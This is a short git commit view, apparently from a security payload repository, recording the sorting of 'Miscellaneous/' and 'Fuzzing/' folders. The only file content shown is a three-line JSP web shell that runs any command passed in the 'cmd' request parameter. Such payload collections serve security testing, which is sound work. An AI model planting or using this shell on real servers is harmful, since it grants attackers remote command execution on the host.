Started sorting "Miscellaneous/" & "Fuzzing/"

This commit is contained in:
g0tmi1k
2017-07-11 13:53:16 +01:00
parent 6f69a35b5e
commit a97be9373e
25 changed files with 245 additions and 0 deletions

View File

@@ -0,0 +1,3 @@
+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>